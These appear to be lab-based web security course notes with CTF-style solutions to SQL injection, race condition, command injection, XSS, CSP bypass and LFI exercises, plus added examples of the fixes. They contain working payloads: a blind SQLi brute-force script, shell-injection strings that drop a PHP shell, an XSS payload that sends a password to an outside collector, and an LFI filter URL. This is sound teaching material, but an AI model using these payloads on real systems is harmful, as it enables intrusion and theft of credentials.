
Bamboofox Web Security 2023

Tools

Burpsuite

https://portswigger.net/burp/releases/professional-community-2023-10-1-1?requestededition=community&requestedplatform=

Python3

https://www.python.org/downloads/

requests

pip3 install requests

HTTP requests

Burpsuite proxy

Status code

  1. Informational responses (100 – 199)
  2. Successful responses (200 – 299)
  3. Redirection messages (300 – 399)
  4. Client error responses (400 – 499)
  5. Server error responses (500 – 599)

HTTP headers

Lab: Cat shop

SQL injection

https://training.ching367436.me/sqlite3-viewer/
https://training.ching367436.me/sql-injection-viewer/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/SQLite Injection.md

Lab: Login panel (login)

UNION based

Lab: Login panel 2 (password)

Lab: Login panel 2 (other table)

1. Extract the table names

' UNION SELECT 1,(),3,4 --

Putting SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' inside the () selects every table name in this database.

Result:

Users,S3cr3t_t4bl3

2. Extract the column names of S3cr3t_t4bl3

SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name='S3cr3t_t4bl3'

Result:

CREATE TABLE S3cr3t_t4bl3 (id INTEGER PRIMARY KEY, flag_test1234 TEXT)

3. Get the flag

SELECT flag_test1234 FROM S3cr3t_t4bl3

Boolean based

Lab: Login panel (password)

' OR substr((SELECT password FROM Users WHERE username='admin'), 1, 1)='B' -- 

Brute-force script

import requests
from string import printable

def f(guess, i):
    # Boolean oracle: one request per (position, character) pair.
    # The page answers with the 2FA step only when the injected condition is true.
    url = "http://bamboofox.cs.nctu.edu.tw:38300/login"
    a = requests.post(url, {
        "username": "guest",
        "password": f"' OR substr((SELECT password FROM Users WHERE username='admin'),{i+1},1)='{guess}' --",
    })
    return '2FA' in a.text


res = ""
for i in range(128):                 # up to 128 characters of the password
    for guess in printable:          # try every printable character at position i
        if f(guess, i):
            res += guess
            break
    print(res)                       # print the prefix recovered so far
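The two login labs above share one root cause: the password value is spliced into the SQL text, so the quote in the payload ends the string literal and the rest is parsed as SQL. The following is an added example (not the lab's code) that builds a throwaway in-memory Users table with a constructed admin password, runs the notes' boolean-based payload against a string-formatted query and against a parameterised one, and includes a crude log-side check for the keywords those payloads need. The table layout and the password 'Bamboo_pw' are assumptions for the demo.

```python
import re
import sqlite3

# Constructed sample data: a throwaway in-memory Users table, not the lab's database.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO Users (username, password) VALUES ('admin', 'Bamboo_pw'), ('guest', 'guest')")
    con.commit()
    return con

def login_vulnerable(con, username, password):
    """Query text built by string formatting: the quote inside the payload closes the
    literal, the OR clause becomes SQL, and '--' comments out the trailing quote."""
    q = f"SELECT username FROM Users WHERE username='{username}' AND password='{password}'"
    return con.execute(q).fetchone() is not None

def login_safe(con, username, password):
    """Bound parameters: the driver passes the values separately from the statement,
    so whatever the client sends is compared as data and never parsed as SQL."""
    q = "SELECT username FROM Users WHERE username=? AND password=?"
    return con.execute(q, (username, password)).fetchone() is not None

# The one-character boolean-based guess from the notes, verbatim.
PAYLOAD = "' OR substr((SELECT password FROM Users WHERE username='admin'), 1, 1)='B' -- "

# Keywords that the UNION- and boolean-based techniques above need to appear in a
# parameter; useful as a first-pass filter over request logs, not as the only defence.
SQLI_MARKERS = re.compile(r"(?i)\b(union\s+select|sqlite_master|substr\s*\(|group_concat\s*\()")

def looks_like_sqli(value):
    return "'" in value and SQLI_MARKERS.search(value) is not None

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", login_vulnerable(con, "guest", PAYLOAD))   # True: admin's password starts with 'B'
    print("parameterised:", login_safe(con, "guest", PAYLOAD))      # False: payload is just a wrong password
    print("flagged:", looks_like_sqli(PAYLOAD))
```

With the formatted query the guess for 'B' logs the guest in even though the guest's password was never given; the same request against the parameterised query is simply a failed login, which is why parameter binding removes the whole class rather than any one payload.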

Other techniques

  • Time based
  • Error based
  • Out-of-band
  • Write file

Tools

  • sqlmap

Race condition

Lab: Starburst Cat Shop

Steps for buying a cat

  1. Check if the balance is sufficient.
  2. Make the cat the buyer's property.
  3. balance -= cat_price
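The three steps are a check-then-act sequence: if two requests both pass step 1 before either reaches step 3, both cats are sold for one cat's money. The following added example (not the lab's code) models the user's row as a small in-memory object and forces that interleaving with a threading.Barrier so the outcome is reproducible; the second version performs the check and the deduction as one unit, which is what a single UPDATE ... WHERE balance >= price (checking its row count) or a row lock inside a transaction does on a real database. Wallet, the prices and the balances are constructed for the demo.

```python
import threading

class Wallet:
    """Constructed stand-in for the shop's user row (not the lab's code)."""
    def __init__(self, balance):
        self.balance = balance
        self.cats = 0
        self.lock = threading.Lock()

def buy_check_then_act(wallet, price, barrier):
    # Step 1 runs outside any critical section ...
    if wallet.balance >= price:
        barrier.wait()              # ... so both requests pass the check before either deducts.
        with wallet.lock:           # Steps 2 and 3 are atomic on their own; that is not enough.
            wallet.cats += 1
            wallet.balance -= price
        return True
    barrier.wait()                  # keep the barrier balanced when the check fails
    return False

def buy_atomic(wallet, price, barrier):
    barrier.wait()                  # both requests arrive at the same moment ...
    with wallet.lock:               # ... but check and deduct happen as one unit.
        if wallet.balance < price:  # DB equivalent:
            return False            #   UPDATE users SET balance = balance - ? WHERE id = ? AND balance >= ?
        wallet.cats += 1            #   and treat rowcount == 0 as "insufficient funds"
        wallet.balance -= price
        return True

def simulate(buy, balance, price, requests=2):
    """Fire `requests` concurrent purchases and return (cats sold, final balance)."""
    wallet = Wallet(balance)
    barrier = threading.Barrier(requests)
    results = []

    def worker():
        results.append(buy(wallet, price, barrier))

    threads = [threading.Thread(target=worker) for _ in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), wallet.balance

if __name__ == "__main__":
    print("check-then-act:", simulate(buy_check_then_act, balance=100, price=80))  # (2, -60)
    print("atomic:        ", simulate(buy_atomic, balance=100, price=80))          # (1, 20)
```

A balance of 100 and a price of 80 gives the clearest signal: the first version sells two cats and leaves the balance negative, the second sells one and rejects the other request. The same reasoning applies to coupons, transfers and anything else that checks a value and then changes it in separate statements.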

Command injection

Command

Tools

Last year's club session: https://discord.com/channels/1003684703284498462/1003684704291143853/1082607913509584956

Slides: https://drive.google.com/file/d/1GKCqR78Hg27sgreviXyFGeeOmzFS6vpL/view?usp=share_link

PHP

Lab: Curl Online

curl -s '$url';

$url = "';ls'";
curl -s '';ls'';

$url = "';l's' '/";
curl -s '';l's' '/';

$url = "'; ca't' '/f''lag-415cd468353da8d26974ae6f8a7d9b30a830b8b4";
curl -s ''; ca't' '/f''lag-415cd468353da8d26974ae6f8a7d9b30a830b8b4';

Lab: Curl Online Pro

Lab: Curl Online Max

https://training.ching367436.me/shell/shell.php
https://training.ching367436.me/shell/shell.php\

solve

https://training.ching367436.me/shell/shell.php' -o ching367436.php 'test
curl -s 'https://training.ching367436.me/shell/shell.php'\\'' -o ching367436.php '\\''test'
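All three Curl Online labs come down to the same mistake: wrapping a user value in single quotes and handing the resulting string to a shell, so a quote inside the value ends the quoting and the rest (';ls', or an extra -o option) is parsed by the shell. The following added example (not the lab's PHP) rebuilds that command line in Python in three ways: the lab's pattern, the same pattern with shlex.quote, and the preferred form where no shell is involved and the URL is a single argv element handed to subprocess. The URL validation rules and the example host example.test are assumptions for the demo.

```python
import shlex
import subprocess
from urllib.parse import urlsplit

def build_command_unsafe(url):
    """The lab's pattern: single quotes around the value, string given to a shell.
    A quote inside `url` ends the literal; everything after it is shell syntax."""
    return f"curl -s '{url}';"

def build_command_quoted(url):
    """shlex.quote rewrites every embedded single quote as '"'"' so the shell
    reassembles exactly one word, whatever the value contains."""
    return f"curl -s {shlex.quote(url)};"

def validate_url(url):
    """Only absolute http(s) URLs with a host; anything else (including a bare
    ';ls' or a value starting with '-') is rejected before reaching curl."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError(f"not an absolute http(s) URL: {url!r}")
    return url

def curl_argv(url):
    """Preferred: no shell at all. The URL is one argv element, so quotes, spaces,
    ';' and '-o' inside it reach curl verbatim as part of the URL and are never
    interpreted as separate commands or options."""
    return ["curl", "-s", validate_url(url)]

def fetch(url, timeout=10):
    """Run curl without a shell; stdout is returned, nothing is interpolated."""
    return subprocess.run(curl_argv(url), capture_output=True, text=True, timeout=timeout).stdout

if __name__ == "__main__":
    print(build_command_unsafe("';ls'"))      # curl -s '';ls';   <- shell runs ls
    print(build_command_quoted("';ls'"))      # one quoted word, no second command
    print(curl_argv("https://example.test/page' -o x.php 'test"))  # the whole string is argv[2]
```

The quoted builder still depends on every call site remembering to quote, and on the shell's quoting rules matching shlex's; the argv form removes the shell from the picture, which is why it is the default to reach for. Validation is a separate layer: it keeps curl from being pointed at file:// or internal hosts, which the quoting question does not address.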

Front-end security

URL

 http://userinfo@bamboofox.cs.nctu.edu.tw:38300/login?name=ferret#nose
 \__/   \_____________________________________/\____/ \_________/\__/
  |                       |                      |         |       |
scheme                authority                path     query   fragment

https://github.com/splitline/domain-obfuscator
http://www.unicode.org/reports/tr46/#Mapping

IDNA2003 requires a mapping phase, which maps ÖBB.at to öbb.at, for example. Mapping typically involves mapping uppercase characters to their lowercase pairs, but it also involves other types of mappings between equivalent characters, such as mapping halfwidth katakana characters to normal katakana characters in Japanese. The mapping phase in IDNA2003 was included to match the insensitivity of ASCII domain names. Users are accustomed to having both CNN.com and cnn.com work identically. They expect domain names with accents to have the same casing behavior, so that ÖBB.at is the same as öbb.at. There are variations similar to case differences in other scripts. The IDNA2003 mapping is based on data specified in the Unicode Standard, Version 3.2; this mapping was later formalized as the Unicode property [NFKC_Casefold].

HTML, CSS, JavaScript

Tools

Same-origin policy

Same-origin: two URLs share an origin only when the scheme (protocol), host and port are all the same.
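The URL diagram above and the same-origin rule fit together: the origin is the scheme plus the host and port from the authority, with userinfo, path, query and fragment discarded. The following added example (not from the course notes) splits a URL into the diagram's five parts with urllib.parse, derives the origin a browser would compare (filling in the default port so http://a and http://a:80 match), and applies Python's built-in idna codec, which implements the IDNA2003 mapping quoted above, to show ÖBB.at and öbb.at becoming the same ASCII label. The hostnames example.test and evil.example are constructed.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443, "ws": 80, "wss": 443}

def url_parts(url):
    """Split a URL into the five pieces of the diagram: scheme, authority, path, query, fragment."""
    p = urlsplit(url)
    return {
        "scheme": p.scheme,
        "authority": p.netloc,      # userinfo@host:port, exactly as written
        "path": p.path,
        "query": p.query,
        "fragment": p.fragment,
    }

def origin(url):
    """The (scheme, host, port) triple the same-origin policy compares.
    userinfo is dropped, the host is lowercased, and a missing port becomes the
    scheme's default so 'http://h' and 'http://h:80' are the same origin."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    host = p.hostname or ""      # .hostname is lowercased and excludes userinfo
    port = p.port if p.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)

def same_origin(a, b):
    return origin(a) == origin(b)

def idna_ascii(host):
    """IDNA2003 as implemented by Python's idna codec: case-fold and NFKC the
    label (the 'mapping phase' above), then punycode it with the xn-- prefix."""
    return host.encode("idna").decode("ascii")

if __name__ == "__main__":
    u = "http://userinfo@bamboofox.cs.nctu.edu.tw:38300/login?name=ferret#nose"
    print(url_parts(u))
    print(origin(u))                                     # ('http', 'bamboofox.cs.nctu.edu.tw', 38300)
    print(origin("http://example.test@evil.example/"))   # host is what follows the last '@'
    print(idna_ascii("ÖBB.at"), idna_ascii("öbb.at"))    # both xn--bb-eka.at
```

Two things worth noticing when reading a link: the part before an @ is userinfo, not the host, which is the trick the domain-obfuscator repository plays with; and a different scheme or port alone makes two URLs cross-origin even on the same host, so http://host and https://host cannot read each other's responses.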

Cross-site scripting (XSS)

Lab: E-Portfolio baby

https://webhook.site/
https://pipedream.net/

fetch('/api/portfolio')
    .then(res => res.json())
    .then(data => {
        location = 'https://enr7kjj1uzbla.x.pipedream.net/?' + data.data.password
    })
<img src=x onerror="fetch('/api/portfolio').then(res => res.json()).then(data => {location = 'https://enr7kjj1uzbla.x.pipedream.net/?'+data.data.password;})">

Solution: https://ching367436.github.io/ais3-pre-exam-2023-write-up/#E-portfolio-baby

Content Security Policy (CSP)

https://csp-evaluator.withgoogle.com/

Lab: E-Portfolio

https://e-portfolio.ching367436.me:8443/avatars/ea6209bcae582fd7a60a77dc71d624e4.svg

<svg xmlns="http://www.w3.org/2000/svg">
    <script href="https://accounts.google.com/o/oauth2/revoke?callback=location='https://ching367436.me';"></script>
</svg>

Solution: https://ching367436.github.io/ais3-pre-exam-2023-write-up/#E-portfolio

XSS games

https://xss-game.appspot.com
https://prompt.ml

Local File Inclusion

Lab: Simple Site (retrieve source code)

https://simple-site.ching367436.me:8443/?page=php://filter/convert.base64-encode/resource=./includes/contact.php

Lab: Simple Site (RCE)

https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT